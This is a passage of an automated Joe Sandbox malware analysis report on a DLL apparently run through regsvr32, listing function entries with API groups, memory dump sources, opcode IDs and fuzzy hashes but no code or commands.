                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 5d4fc64fa68401ac22ac86c66de0f044c2a7129c20872a196546d2c4accfd566
                                                                                                                                                                                    • Instruction ID: c16e0e0e78a499e2ca79a6ec12ba22cc8830681fc3ecca116b749b798c8ae8a0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d4fc64fa68401ac22ac86c66de0f044c2a7129c20872a196546d2c4accfd566
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D319132310B5582FB96DB13E8547E96760EB8CFC4F048131BE1A4BB99DF29C24A8300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000213C Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ParentWindow$CallProcRect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 640952022-0
                                                                                                                                                                                    • Opcode ID: 3a6e834603606daeb17b68b6877642d0b5c5b2869fc060148c92c94b17035ed9
                                                                                                                                                                                    • Instruction ID: 3f0024fa22fb02943d83acd78c3ac48632e632c280785a7ce128af42f74ca6e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a6e834603606daeb17b68b6877642d0b5c5b2869fc060148c92c94b17035ed9
                                                                                                                                                                                    • Instruction Fuzzy Hash: DD315E3061464891FAE6DB81A5807ED73A1FBACBC0F14C121FE4603B99CE78CA5C8701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800197E0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1078018258-0
                                                                                                                                                                                    • Opcode ID: 4ac4820cab029e278d4a0c98603d87ff7d551b39c9db84fcfa17d2f06afe9701
                                                                                                                                                                                    • Instruction ID: 69967b995c0393e2effd2d8ed2c2215b5f31fca2a0db19b53045e9dc830d743f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ac4820cab029e278d4a0c98603d87ff7d551b39c9db84fcfa17d2f06afe9701
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06214F36602A8986E7999B56D5443EA7360F38DFC4F48C021EF5507754DF39DAA9C340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800100FC Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1496643700-0
                                                                                                                                                                                    • Opcode ID: 605e714b6c71993bfaa07453adaf1c1d76bdc130fbb0fabf031c4d216f220953
                                                                                                                                                                                    • Instruction ID: fc9a471d184917d6cb748f655331fd99bdc735ecce10370ce1d1e568dc173544
                                                                                                                                                                                    • Opcode Fuzzy Hash: 605e714b6c71993bfaa07453adaf1c1d76bdc130fbb0fabf031c4d216f220953
                                                                                                                                                                                    • Instruction Fuzzy Hash: 96115736205B4887EB529F45A4007DAB7A0FBCDBD0F288525FE8907759DF7CD6488B40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180011A2C Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Capture
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1665607226-0
                                                                                                                                                                                    • Opcode ID: 60364d07ba75760cf71bad0e019b1f9e807bf02d4eb6f8eeca038063c35c156c
                                                                                                                                                                                    • Instruction ID: bbaa5c65138986585612c4aa79743df0a7e6e48727a73170b0c10e54f31dc3ba
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60364d07ba75760cf71bad0e019b1f9e807bf02d4eb6f8eeca038063c35c156c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11B136710A4987EBA29B25E455BDE7BA0FBCCBC9F589010EE0907B15DE79C1488B00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001CEE4 Relevance: 6.1, APIs: 4, Instructions: 54registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$CreatePrivateProfileStringValueWriteswprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2653322536-0
                                                                                                                                                                                    • Opcode ID: c9f5dc270799bd5522e95d003daec111fa4deb5f29ca4711c4ba892838f7a073
                                                                                                                                                                                    • Instruction ID: 5b29882e868a6fd1e16fa975dfc61378143b8e5f2b480f48924c4e52e78407a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9f5dc270799bd5522e95d003daec111fa4deb5f29ca4711c4ba892838f7a073
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA11C472315A8886EB929B51A9447DAB361A74CFD4F548021BE4E03B54DE38C2898700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800139A8 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnableFocusItemMenuMessageParentSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2297321873-0
                                                                                                                                                                                    • Opcode ID: 1a3ab23d524d00eee761092b020d5b2296136dd50dcee9d80a2edd54e68012be
                                                                                                                                                                                    • Instruction ID: 9f030b4daa1d4564a357626c60b85240f94bf69f5dec3af242dc07f722bf6809
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a3ab23d524d00eee761092b020d5b2296136dd50dcee9d80a2edd54e68012be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 16118E3661095882EBA6DF22E4427A93330FB8CFC4F649111EA8907A59CF75C9898701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000F7D0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 369458955-0
                                                                                                                                                                                    • Opcode ID: 7749611a7d39eb1f4290cb8defc77b946edff1f1eac32e30af29a2a1b6198d25
                                                                                                                                                                                    • Instruction ID: a05238bd983b7ee5d0ad8dcd1319f9a90ab92def2c469c7e21d1bc8ad19c9528
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7749611a7d39eb1f4290cb8defc77b946edff1f1eac32e30af29a2a1b6198d25
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A113A31606B4981EEE7DB1664003E97290AF8CFC0F18D438BD4A47B95EE38DA099700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001B914 Relevance: 6.0, APIs: 4, Instructions: 50stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: TextWindow$lstrcmplstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 330964273-0
                                                                                                                                                                                    • Opcode ID: 852954a67715a888015f4ea8e9a2051558ba1576db5fbaa438e17db1179cd72b
                                                                                                                                                                                    • Instruction ID: 6791ba3af73d40aaf5a26d80917a6b1c9c18b946febdd392779d9161e5f3dd87
                                                                                                                                                                                    • Opcode Fuzzy Hash: 852954a67715a888015f4ea8e9a2051558ba1576db5fbaa438e17db1179cd72b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A116031304A4845FBB6DB21A4543EA6391BB8CBC4F458120EA8987B49DF2CC60A8B40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800134A0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1078018258-0
                                                                                                                                                                                    • Opcode ID: 078b3086d9b1ab60f6b4b0d9882db66d3cf4840841511b762073b086b378563b
                                                                                                                                                                                    • Instruction ID: 8cb12c1e71957563a1982afe5abe401c72238c298aaa4ca87bc3f6f6146552c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 078b3086d9b1ab60f6b4b0d9882db66d3cf4840841511b762073b086b378563b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5211C031301F4485EF9A9B07A80539AABA1BB8DFC1F4D8024BE0D07B54DF38C5448300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002329C Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalDeleteSection$Freefree
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1250194111-0
                                                                                                                                                                                    • Opcode ID: a0c4a12fc39ab858f68242b191a4261d211bdaa5e5499dbb034cad227024c354
                                                                                                                                                                                    • Instruction ID: c81c83d248b2977ad5c055a00aa33d05fee2d091861bd76fe934e3578cf968a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0c4a12fc39ab858f68242b191a4261d211bdaa5e5499dbb034cad227024c354
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D119E31A01A48C6FB978F11E4843D97361F74DFD6F998111FA1502AA5CF28C799C704
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180019D86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 253586258-0
                                                                                                                                                                                    • Opcode ID: 24de49aab05f9171fb599d2599f233cf6ba041d9d6350c17cfca42616a7246ca
                                                                                                                                                                                    • Instruction ID: 168779c7d06fda5701b976c42ac827f61fd7bcb5da61f4dc0295c4c57bc60ca8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 24de49aab05f9171fb599d2599f233cf6ba041d9d6350c17cfca42616a7246ca
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80110036205E8481EBD79F52E5043EA6361F78DFE9F088121DE0A07799CF38C58AC701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002D71C Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DecodePointer_errno_flush_freebuf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889905870-0
                                                                                                                                                                                    • Opcode ID: f463701d1e99936b6396fa9d89ed731a1a06bd4ad86f90ea1957cedce3c7cfa4
                                                                                                                                                                                    • Instruction ID: 8c0dd11aab544b55fc7a65af4e3d04d34c277e9ecd3ebfe11d75822ed71029ab
                                                                                                                                                                                    • Opcode Fuzzy Hash: f463701d1e99936b6396fa9d89ed731a1a06bd4ad86f90ea1957cedce3c7cfa4
                                                                                                                                                                                    • Instruction Fuzzy Hash: B5012433A0864D06FFA7AA7598253EC13515B9C7E8F388621BE14821C3EEB8CA088300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180014FE4 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ClientEnabledFromParentPointScreen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1871804413-0
                                                                                                                                                                                    • Opcode ID: 6215ec9babe71f725203d4b69f3f00fe3681b40d2b2e1cc0c9848f3c74822014
                                                                                                                                                                                    • Instruction ID: 5c6b39c5ce4194a9d229c6af1cffabe98cca04a799f85e9edd1f4113c9732ee5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6215ec9babe71f725203d4b69f3f00fe3681b40d2b2e1cc0c9848f3c74822014
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD014F31305F49C6EF979756A5543EA53A4AB8DFC1F088024EE8E4B785EF3DC5588340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002AE80 Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                    • Opcode ID: 26de6a718b0878d1b5bf1fbdb1dc7fc81f81b664a8838746a38ba36cf685e869
                                                                                                                                                                                    • Instruction ID: bacdd934eadcc22450b02e0ef1d64ba5f5ba20e57c2b1a692a51202ad69cc5d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 26de6a718b0878d1b5bf1fbdb1dc7fc81f81b664a8838746a38ba36cf685e869
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE01DF72619B4C4AFED75B64C8953EC23519BDABB5F62C301FA2906BD2CF28461A8710
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180010E30 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
